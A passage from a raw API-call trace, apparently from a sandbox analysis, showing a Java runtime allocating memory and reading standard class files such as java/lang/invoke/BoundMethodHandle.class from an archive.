returned 0x12ed3fc0 [0114.580] malloc (_Size=0xa0) returned 0x12dab7e0 [0114.581] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3415d05, lpNewFilePointer=0x208cc10, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cc10*=54615301) returned 1 [0114.581] ReadFile (in: hFile=0x134, lpBuffer=0x12dab7e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cbe0, lpOverlapped=0x0 | out: lpBuffer=0x12dab7e0*, lpNumberOfBytesRead=0x208cbe0*=0xa0, lpOverlapped=0x0) returned 1 [0114.581] malloc (_Size=0x25) returned 0x12ef1380 [0114.594] strlen (_Str="sun/invoke/util/Wrapper.class") returned 0x1d [0114.594] malloc (_Size=0x48) returned 0x1228ed20 [0114.594] malloc (_Size=0xa0) returned 0x12dab100 [0114.594] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3415cba, lpNewFilePointer=0x208c030, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c030*=54615226) returned 1 [0114.594] ReadFile (in: hFile=0x134, lpBuffer=0x12dab100, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c000, lpOverlapped=0x0 | out: lpBuffer=0x12dab100*, lpNumberOfBytesRead=0x208c000*=0xa0, lpOverlapped=0x0) returned 1 [0114.594] malloc (_Size=0x1e) returned 0x12ef13b0 [0114.601] strlen (_Str="sun/invoke/util/Wrapper$Format.class") returned 0x24 [0114.601] malloc (_Size=0x48) returned 0x12ed3fc0 [0114.601] malloc (_Size=0xa0) returned 0x12dac5a0 [0114.601] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3415c68, lpNewFilePointer=0x208b670, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b670*=54615144) returned 1 [0114.601] ReadFile (in: hFile=0x134, lpBuffer=0x12dac5a0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b640, lpOverlapped=0x0 | out: lpBuffer=0x12dac5a0*, lpNumberOfBytesRead=0x208b640*=0xa0, lpOverlapped=0x0) returned 1 [0114.601] malloc (_Size=0x25) returned 0x12ef13e0 [0114.607] strlen (_Str="java/lang/Byte$ByteCache.class") returned 0x1e [0114.607] malloc (_Size=0x48) returned 0x1228ed20 [0114.607] malloc (_Size=0xa0) returned 0x12dab310 [0114.607] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3415c1c, lpNewFilePointer=0x208b7a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b7a0*=54615068) returned 1 [0114.607] ReadFile (in: hFile=0x134, lpBuffer=0x12dab310, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b770, lpOverlapped=0x0 | out: lpBuffer=0x12dab310*, lpNumberOfBytesRead=0x208b770*=0xa0, lpOverlapped=0x0) returned 1 [0114.608] malloc (_Size=0x1f) returned 0x12ef15f0 [0114.612] strlen (_Str="java/lang/Short$ShortCache.class") returned 0x20 [0114.612] malloc (_Size=0x48) returned 0x12ed3fc0 [0114.612] malloc (_Size=0xa0) returned 0x12daaef0 [0114.612] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3415bce, lpNewFilePointer=0x208b790, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b790*=54614990) returned 1 [0114.612] ReadFile (in: hFile=0x134, lpBuffer=0x12daaef0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b760, lpOverlapped=0x0 | out: lpBuffer=0x12daaef0*, lpNumberOfBytesRead=0x208b760*=0xa0, lpOverlapped=0x0) returned 1 [0114.612] malloc (_Size=0x21) returned 0x12ef1590 [0114.617] strlen (_Str="java/lang/Character$CharacterCache.class") returned 0x28 [0114.617] malloc (_Size=0x48) returned 0x1228ed20 [0114.617] malloc (_Size=0xa0) returned 0x12dab520 [0114.617] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3415b78, lpNewFilePointer=0x208b7a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b7a0*=54614904) returned 1 [0114.617] ReadFile (in: hFile=0x134, lpBuffer=0x12dab520, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b770, lpOverlapped=0x0 | out: lpBuffer=0x12dab520*, lpNumberOfBytesRead=0x208b770*=0xa0, lpOverlapped=0x0) returned 1 [0114.617] malloc (_Size=0x29) returned 0x12ef4250 [0114.645] strlen (_Str="java/lang/Long$LongCache.class") returned 0x1e [0114.645] malloc (_Size=0x48) returned 0x12ed3fc0 [0114.645] malloc (_Size=0xa0) returned 0x12dac5a0 [0114.645] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3415b2c, lpNewFilePointer=0x208b790, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b790*=54614828) returned 1 [0114.645] ReadFile (in: hFile=0x134, lpBuffer=0x12dac5a0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b760, lpOverlapped=0x0 | out: lpBuffer=0x12dac5a0*, lpNumberOfBytesRead=0x208b760*=0xa0, lpOverlapped=0x0) returned 1 [0114.646] malloc (_Size=0x1f) returned 0x12ef1410 [0114.664] strlen (_Str="sun/invoke/util/VerifyAccess.class") returned 0x22 [0114.664] malloc (_Size=0x48) returned 0x1228ed20 [0114.664] malloc (_Size=0xa0) returned 0x12dab100 [0114.664] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3415adc, lpNewFilePointer=0x208d100, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d100*=54614748) returned 1 [0114.664] ReadFile (in: hFile=0x134, lpBuffer=0x12dab100, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d0d0, lpOverlapped=0x0 | out: lpBuffer=0x12dab100*, lpNumberOfBytesRead=0x208d0d0*=0xa0, lpOverlapped=0x0) returned 1 [0114.664] malloc (_Size=0x23) returned 0x12ef1290 [0114.704] strlen (_Str="sun/invoke/util/ValueConversions.class") returned 0x26 [0114.704] malloc (_Size=0x48) returned 0x12ed3fc0 [0114.717] malloc (_Size=0xa0) returned 0x12dabe10 [0114.717] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3415a88, lpNewFilePointer=0x208d1a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d1a0*=54614664) returned 1 [0114.717] ReadFile (in: hFile=0x134, lpBuffer=0x12dabe10, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d170, lpOverlapped=0x0 | out: lpBuffer=0x12dabe10*, lpNumberOfBytesRead=0x208d170*=0xa0, lpOverlapped=0x0) returned 1 [0114.717] malloc (_Size=0x27) returned 0x12ef13b0 [0114.812] strlen (_Str="java/lang/NoSuchMethodException.class") returned 0x25 [0114.812] malloc (_Size=0x48) returned 0x1228ed20 [0114.812] malloc (_Size=0xa0) returned 0x12dac020 [0114.813] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3415a35, lpNewFilePointer=0x208d080, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d080*=54614581) returned 1 [0114.813] ReadFile (in: hFile=0x134, lpBuffer=0x12dac020, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d050, lpOverlapped=0x0 | out: lpBuffer=0x12dac020*, lpNumberOfBytesRead=0x208d050*=0xa0, lpOverlapped=0x0) returned 1 [0114.813] malloc (_Size=0x26) returned 0x12ef1410 [0114.837] strlen (_Str="java/lang/invoke/LambdaForm$BasicType.class") returned 0x2b [0114.837] malloc (_Size=0x48) returned 0x12ed3fc0 [0114.837] malloc (_Size=0xa0) returned 0x12daafa0 [0114.837] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34159dc, lpNewFilePointer=0x208c5f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c5f0*=54614492) returned 1 [0114.838] ReadFile (in: hFile=0x134, lpBuffer=0x12daafa0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c5c0, lpOverlapped=0x0 | out: lpBuffer=0x12daafa0*, lpNumberOfBytesRead=0x208c5c0*=0xa0, lpOverlapped=0x0) returned 1 [0114.838] malloc (_Size=0x2c) returned 0x12ef4250 [0114.863] strlen (_Str="java/lang/invoke/LambdaForm$Name.class") returned 0x26 [0114.864] malloc (_Size=0x48) returned 0x1228ed20 [0114.864] malloc (_Size=0xa0) returned 0x12dac860 [0114.864] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3415988, lpNewFilePointer=0x208c670, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c670*=54614408) returned 1 [0114.864] ReadFile (in: hFile=0x134, lpBuffer=0x12dac860, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c640, lpOverlapped=0x0 | out: lpBuffer=0x12dac860*, lpNumberOfBytesRead=0x208c640*=0xa0, lpOverlapped=0x0) returned 1 [0114.864] malloc (_Size=0x27) returned 0x12ef13b0 [0114.911] free (_Block=0x12ef4250) [0114.911] free (_Block=0x12ed3fc0) [0114.963] malloc (_Size=0x48) returned 0x12ed3fc0 [0114.963] malloc (_Size=0xa0) returned 0x12dab260 [0114.963] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341592b, lpNewFilePointer=0x208c730, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c730*=54614315) returned 1 [0114.963] ReadFile (in: hFile=0x134, lpBuffer=0x12dab260, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c700, lpOverlapped=0x0 | out: lpBuffer=0x12dab260*, lpNumberOfBytesRead=0x208c700*=0xa0, lpOverlapped=0x0) returned 1 [0114.963] malloc (_Size=0x30) returned 0x12ef4250 [0114.964] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3060b91, lpNewFilePointer=0x208c330, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c330*=50727825) returned 1 [0114.964] ReadFile (in: hFile=0x134, lpBuffer=0x208c380, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c300, lpOverlapped=0x0 | out: lpBuffer=0x208c380*, lpNumberOfBytesRead=0x208c300*=0x1e, lpOverlapped=0x0) returned 1 [0114.965] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3060bde, lpNewFilePointer=0x208c390, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c390*=50727902) returned 1 [0114.965] ReadFile (in: hFile=0x134, lpBuffer=0x12e91d60, nNumberOfBytesToRead=0x287d, lpNumberOfBytesRead=0x208c360, lpOverlapped=0x0 | out: lpBuffer=0x12e91d60*, lpNumberOfBytesRead=0x208c360*=0x287d, lpOverlapped=0x0) returned 1 [0115.039] strlen (_Str="java/lang/invoke/SimpleMethodHandle.class") returned 0x29 [0115.039] malloc (_Size=0x48) returned 0x1228ed20 [0115.039] malloc (_Size=0xa0) returned 0x12daace0 [0115.039] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34158d4, lpNewFilePointer=0x208c380, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c380*=54614228) returned 1 [0115.039] ReadFile (in: hFile=0x134, lpBuffer=0x12daace0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c350, lpOverlapped=0x0 | out: lpBuffer=0x12daace0*, lpNumberOfBytesRead=0x208c350*=0xa0, lpOverlapped=0x0) returned 1 [0115.039] malloc (_Size=0x2a) returned 0x12ef43d0 [0115.040] strlen (_Str="java/lang/invoke/SimpleMethodHandle.class") returned 0x29 [0115.040] strcpy (in: _Dest=0x208c500, _Source="java/lang/invoke/SimpleMethodHandle.class" | out: _Dest="java/lang/invoke/SimpleMethodHandle.class") returned="java/lang/invoke/SimpleMethodHandle.class" [0115.040] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x305ffb9, lpNewFilePointer=0x208bf80, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bf80*=50724793) returned 1 [0115.040] ReadFile (in: hFile=0x134, lpBuffer=0x208bfd0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bf50, lpOverlapped=0x0 | out: lpBuffer=0x208bfd0*, lpNumberOfBytesRead=0x208bf50*=0x1e, lpOverlapped=0x0) returned 1 [0115.041] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3060000, lpNewFilePointer=0x208bfe0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bfe0*=50724864) returned 1 [0115.041] ReadFile (in: hFile=0x134, lpBuffer=0x12e91d60, nNumberOfBytesToRead=0xb91, lpNumberOfBytesRead=0x208bfb0, lpOverlapped=0x0 | out: lpBuffer=0x12e91d60*, lpNumberOfBytesRead=0x208bfb0*=0xb91, lpOverlapped=0x0) returned 1 [0115.041] free (_Block=0x12ef4250) [0115.042] free (_Block=0x12ed3fc0) [0115.045] strlen (_Str="java/lang/invoke/BoundMethodHandle.class") returned 0x28 [0115.045] malloc (_Size=0x48) returned 0x12ed3fc0 [0115.045] malloc (_Size=0xa0) returned 0x12dac9c0 [0115.045] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341587e, lpNewFilePointer=0x208b940, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b940*=54614142) returned 1 [0115.045] ReadFile (in: hFile=0x134, lpBuffer=0x12dac9c0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b910, lpOverlapped=0x0 | out: lpBuffer=0x12dac9c0*, lpNumberOfBytesRead=0x208b910*=0xa0, lpOverlapped=0x0) returned 1 [0115.045] malloc (_Size=0x29) returned 0x12ef4490 [0115.046] strlen (_Str="java/lang/invoke/BoundMethodHandle.class") returned 0x28 [0115.046] strcpy (in: _Dest=0x208bac0, _Source="java/lang/invoke/BoundMethodHandle.class" | out: _Dest="java/lang/invoke/BoundMethodHandle.class") returned="java/lang/invoke/BoundMethodHandle.class" [0115.046] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x305de4a, lpNewFilePointer=0x208b540, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b540*=50716234) returned 1 [0115.046] ReadFile (in: hFile=0x134, lpBuffer=0x208b590, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b510, lpOverlapped=0x0 | out: lpBuffer=0x208b590*, lpNumberOfBytesRead=0x208b510*=0x1e, lpOverlapped=0x0) returned 1 [0115.064] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x305de90, lpNewFilePointer=0x208b5a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b5a0*=50716304) returned 1 [0115.064] ReadFile (in: hFile=0x134, lpBuffer=0x12e92ac0, nNumberOfBytesToRead=0x2129, lpNumberOfBytesRead=0x208b570, lpOverlapped=0x0 | out: lpBuffer=0x12e92ac0*, lpNumberOfBytesRead=0x208b570*=0x2129, lpOverlapped=0x0) returned 1 [0115.065] free (_Block=0x12ef43d0) [0115.066] free (_Block=0x1228ed20) [0115.084] strlen (_Str="java/lang/invoke/BoundMethodHandle$SpeciesData.class") returned 0x34 [0115.084] malloc (_Size=0x48) returned 0x1228ed20 [0115.084] malloc (_Size=0xa0) returned 0x12dac4f0 [0115.084] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341581c, lpNewFilePointer=0x208ba40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ba40*=54614044) returned 1 [0115.084] ReadFile (in: hFile=0x134, lpBuffer=0x12dac4f0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ba10, lpOverlapped=0x0 | out: lpBuffer=0x12dac4f0*, lpNumberOfBytesRead=0x208ba10*=0xa0, lpOverlapped=0x0) returned 1 [0115.084] malloc (_Size=0x35) returned 0x12ef4410 [0115.085] strlen (_Str="java/lang/invoke/BoundMethodHandle$SpeciesData.class") returned 0x34 [0115.085] strcpy (in: _Dest=0x208bbc0, _Source="java/lang/invoke/BoundMethodHandle$SpeciesData.class" | out: _Dest="java/lang/invoke/BoundMethodHandle$SpeciesData.class") returned="java/lang/invoke/BoundMethodHandle$SpeciesData.class" [0115.085] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x305c62e, lpNewFilePointer=0x208b640, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b640*=50710062) returned 1 [0115.085] ReadFile (in: hFile=0x134, lpBuffer=0x208b690, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b610, lpOverlapped=0x0 | out: lpBuffer=0x208b690*, lpNumberOfBytesRead=0x208b610*=0x1e, lpOverlapped=0x0) returned 1 [0115.086] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x305c680, lpNewFilePointer=0x208b6a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b6a0*=50710144) returned 1 [0115.086] ReadFile (in: hFile=0x134, lpBuffer=0x12e91d60, nNumberOfBytesToRead=0x17ca, lpNumberOfBytesRead=0x208b670, lpOverlapped=0x0 | out: lpBuffer=0x12e91d60*, lpNumberOfBytesRead=0x208b670*=0x17ca, lpOverlapped=0x0) returned 1 [0115.087] free (_Block=0x12ef4490) [0115.087] free (_Block=0x12ed3fc0) [0115.091] malloc (_Size=0x48) returned 0x12ed3fc0 [0115.091] malloc (_Size=0xa0) returned 0x12daace0 [0115.092] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34157be, lpNewFilePointer=0x208af30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208af30*=54613950) returned 1 [0115.092] ReadFile (in: hFile=0x134, lpBuffer=0x12daace0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208af00, lpOverlapped=0x0 | out: lpBuffer=0x12daace0*, lpNumberOfBytesRead=0x208af00*=0xa0, lpOverlapped=0x0) returned 1 [0115.092] malloc (_Size=0x31) returned 0x12ef4250 [0115.092] strlen (_Str="java/lang/invoke/BoundMethodHandle$Factory.class") returned 0x30 [0115.092] strcpy (in: _Dest=0x208b0b0, _Source="java/lang/invoke/BoundMethodHandle$Factory.class" | out: _Dest="java/lang/invoke/BoundMethodHandle$Factory.class") returned="java/lang/invoke/BoundMethodHandle$Factory.class" [0115.092] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3059bc0, lpNewFilePointer=0x208ab30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ab30*=50699200) returned 1 [0115.092] ReadFile (in: hFile=0x134, lpBuffer=0x208ab80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208ab00, lpOverlapped=0x0 | out: lpBuffer=0x208ab80*, lpNumberOfBytesRead=0x208ab00*=0x1e, lpOverlapped=0x0) returned 1 [0115.093] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3059c0e, lpNewFilePointer=0x208ab90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ab90*=50699278) returned 1 [0115.093] ReadFile (in: hFile=0x134, lpBuffer=0x12e91d60, nNumberOfBytesToRead=0x2a20, lpNumberOfBytesRead=0x208ab60, lpOverlapped=0x0 | out: lpBuffer=0x12e91d60*, lpNumberOfBytesRead=0x208ab60*=0x2a20, lpOverlapped=0x0) returned 1 [0115.094] free (_Block=0x12ef4410) [0115.095] free (_Block=0x1228ed20) [0115.097] malloc (_Size=0x48) returned 0x1228ed20 [0115.098] malloc (_Size=0xa0) returned 0x12dac700 [0115.098] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341575e, lpNewFilePointer=0x208b120, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b120*=54613854) returned 1 [0115.098] ReadFile (in: hFile=0x134, lpBuffer=0x12dac700, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b0f0, lpOverlapped=0x0 | out: lpBuffer=0x12dac700*, lpNumberOfBytesRead=0x208b0f0*=0xa0, lpOverlapped=0x0) returned 1 [0115.098] malloc (_Size=0x33) returned 0x12ef43d0 [0115.098] strlen (_Str="java/lang/invoke/BoundMethodHandle$Species_L.class") returned 0x32 [0115.098] strcpy (in: _Dest=0x208b2a0, _Source="java/lang/invoke/BoundMethodHandle$Species_L.class" | out: _Dest="java/lang/invoke/BoundMethodHandle$Species_L.class") returned="java/lang/invoke/BoundMethodHandle$Species_L.class" [0115.098] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3058e05, lpNewFilePointer=0x208ad20, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ad20*=50695685) returned 1 [0115.098] ReadFile (in: hFile=0x134, lpBuffer=0x208ad70, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208acf0, lpOverlapped=0x0 | out: lpBuffer=0x208ad70*, lpNumberOfBytesRead=0x208acf0*=0x1e, lpOverlapped=0x0) returned 1 [0115.099] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3058e55, lpNewFilePointer=0x208ad80, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ad80*=50695765) returned 1 [0115.099] ReadFile (in: hFile=0x134, lpBuffer=0x12e91d60, nNumberOfBytesToRead=0xd6b, lpNumberOfBytesRead=0x208ad50, lpOverlapped=0x0 | out: lpBuffer=0x12e91d60*, lpNumberOfBytesRead=0x208ad50*=0xd6b, lpOverlapped=0x0) returned 1 [0115.099] free (_Block=0x12ef4250) [0115.100] free (_Block=0x12ed3fc0) [0115.110] strlen (_Str="sun/invoke/util/BytecodeDescriptor.class") returned 0x28 [0115.110] malloc (_Size=0x48) returned 0x12ed3fc0 [0115.110] malloc (_Size=0xa0) returned 0x12dac390 [0115.110] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3415669, lpNewFilePointer=0x208add0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208add0*=54613609) returned 1 [0115.110] ReadFile (in: hFile=0x134, lpBuffer=0x12dac390, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ada0, lpOverlapped=0x0 | out: lpBuffer=0x12dac390*, lpNumberOfBytesRead=0x208ada0*=0xa0, lpOverlapped=0x0) returned 1 [0115.110] malloc (_Size=0x29) returned 0x12ef4250 [0115.111] strlen (_Str="sun/invoke/util/BytecodeDescriptor.class") returned 0x28 [0115.111] strcpy (in: _Dest=0x208af50, _Source="sun/invoke/util/BytecodeDescriptor.class" | out: _Dest="sun/invoke/util/BytecodeDescriptor.class") returned="sun/invoke/util/BytecodeDescriptor.class" [0115.111] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x305755c, lpNewFilePointer=0x208a9d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208a9d0*=50689372) returned 1 [0115.111] ReadFile (in: hFile=0x134, lpBuffer=0x208aa20, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208a9a0, lpOverlapped=0x0 | out: lpBuffer=0x208aa20*, lpNumberOfBytesRead=0x208a9a0*=0x1e, lpOverlapped=0x0) returned 1 [0115.112] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30575a2, lpNewFilePointer=0x208aa30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208aa30*=50689442) returned 1 [0115.112] ReadFile (in: hFile=0x134, lpBuffer=0x12e91d60, nNumberOfBytesToRead=0xf06, lpNumberOfBytesRead=0x208aa00, lpOverlapped=0x0 | out: lpBuffer=0x12e91d60*, lpNumberOfBytesRead=0x208aa00*=0xf06, lpOverlapped=0x0) returned 1 [0115.113] free (_Block=0x12ef43d0) [0115.113] free (_Block=0x1228ed20) [0115.121] strlen (_Str="java/lang/invoke/MethodType") returned 0x1b [0115.121] strlen (_Str="java/lang/invoke/LambdaForm") returned 0x1b [0115.122] strlen (_Str="java/lang/invoke/BoundMethodHandle") returned 0x22 [0115.133] strlen (_Str="java/lang/invoke/DirectMethodHandle$Lazy.class") returned 0x2e [0115.133] malloc (_Size=0x48) returned 0x1228ed20 [0115.133] malloc (_Size=0xa0) returned 0x12dabf70 [0115.133] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341560d, lpNewFilePointer=0x208abc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208abc0*=54613517) returned 1 [0115.133] ReadFile (in: hFile=0x134, lpBuffer=0x12dabf70, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ab90, lpOverlapped=0x0 | out: lpBuffer=0x12dabf70*, lpNumberOfBytesRead=0x208ab90*=0xa0, lpOverlapped=0x0) returned 1 [0115.133] malloc (_Size=0x2f) returned 0x12ef43d0 [0115.134] strlen (_Str="java/lang/invoke/DirectMethodHandle$Lazy.class") returned 0x2e [0115.134] strcpy (in: _Dest=0x208ad40, _Source="java/lang/invoke/DirectMethodHandle$Lazy.class" | out: _Dest="java/lang/invoke/DirectMethodHandle$Lazy.class") returned="java/lang/invoke/DirectMethodHandle$Lazy.class" [0115.134] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3056b89, lpNewFilePointer=0x208a7c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208a7c0*=50686857) returned 1 [0115.134] ReadFile (in: hFile=0x134, lpBuffer=0x208a810, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208a790, lpOverlapped=0x0 | out: lpBuffer=0x208a810*, lpNumberOfBytesRead=0x208a790*=0x1e, lpOverlapped=0x0) returned 1 [0115.134] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3056bd5, lpNewFilePointer=0x208a820, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208a820*=50686933) returned 1 [0115.134] ReadFile (in: hFile=0x134, lpBuffer=0x12e91d60, nNumberOfBytesToRead=0x987, lpNumberOfBytesRead=0x208a7f0, lpOverlapped=0x0 | out: lpBuffer=0x12e91d60*, lpNumberOfBytesRead=0x208a7f0*=0x987, lpOverlapped=0x0) returned 1 [0115.135] free (_Block=0x12ef4250) [0115.135] free (_Block=0x12ed3fc0) [0115.151] strlen (_Str="java/lang/InstantiationException.class") returned 0x26 [0115.151] malloc (_Size=0x48) returned 0x12ed3fc0 [0115.152] malloc (_Size=0xa0) returned 0x12dab3c0 [0115.152] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34155b9, lpNewFilePointer=0x208a050, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208a050*=54613433) returned 1 [0115.152] ReadFile (in: hFile=0x134, lpBuffer=0x12dab3c0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208a020, lpOverlapped=0x0 | out: lpBuffer=0x12dab3c0*, lpNumberOfBytesRead=0x208a020*=0xa0, lpOverlapped=0x0) returned 1 [0115.152] malloc (_Size=0x27) returned 0x12ef15f0 [0115.152] strlen (_Str="java/lang/InstantiationException.class") returned 0x26 [0115.152] strcpy (in: _Dest=0x208a1d0, _Source="java/lang/InstantiationException.class" | out: _Dest="java/lang/InstantiationException.class") returned="java/lang/InstantiationException.class" [0115.152] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3056a1a, lpNewFilePointer=0x2089c50, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089c50*=50686490) returned 1 [0115.152] ReadFile (in: hFile=0x134, lpBuffer=0x2089ca0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x2089c20, lpOverlapped=0x0 | out: lpBuffer=0x2089ca0*, lpNumberOfBytesRead=0x2089c20*=0x1e, lpOverlapped=0x0) returned 1 [0115.152] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3056a5e, lpNewFilePointer=0x2089cb0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089cb0*=50686558) returned 1 [0115.152] ReadFile (in: hFile=0x134, lpBuffer=0x20fea70, nNumberOfBytesToRead=0x12b, lpNumberOfBytesRead=0x2089c80, lpOverlapped=0x0 | out: lpBuffer=0x20fea70*, lpNumberOfBytesRead=0x2089c80*=0x12b, lpOverlapped=0x0) returned 1 [0115.153] free (_Block=0x12ef43d0) [0115.153] free (_Block=0x1228ed20) [0115.166] strlen (_Str="java/lang/invoke/DirectMethodHandle$Interface.class") returned 0x33 [0115.166] malloc (_Size=0x48) returned 0x1228ed20 [0115.166] malloc (_Size=0xa0) returned 0x12dabec0 [0115.166] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x332656c, lpNewFilePointer=0x208a380, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208a380*=53634412) returned 1 [0115.167] ReadFile (in: hFile=0x134, lpBuffer=0x12dabec0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208a350, lpOverlapped=0x0 | out: lpBuffer=0x12dabec0*, lpNumberOfBytesRead=0x208a350*=0xa0, lpOverlapped=0x0) returned 1 [0115.169] malloc (_Size=0x34) returned 0x12ef4250 [0115.169] strlen (_Str="java/lang/invoke/DirectMethodHandle$Interface.class") returned 0x33 [0115.170] strcpy (in: _Dest=0x208a500, _Source="java/lang/invoke/DirectMethodHandle$Interface.class" | out: _Dest="java/lang/invoke/DirectMethodHandle$Interface.class") returned="java/lang/invoke/DirectMethodHandle$Interface.class" [0115.170] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x16c05fd, lpNewFilePointer=0x2089f80, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089f80*=23856637) returned 1 [0115.170] ReadFile (in: hFile=0x134, lpBuffer=0x2089fd0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x2089f50, lpOverlapped=0x0 | out: lpBuffer=0x2089fd0*, lpNumberOfBytesRead=0x2089f50*=0x1e, lpOverlapped=0x0) returned 1 [0115.174] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x16c064e, lpNewFilePointer=0x2089fe0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089fe0*=23856718) returned 1 [0115.174] ReadFile (in: hFile=0x134, lpBuffer=0x12e91d60, nNumberOfBytesToRead=0x884, lpNumberOfBytesRead=0x2089fb0, lpOverlapped=0x0 | out: lpBuffer=0x12e91d60*, 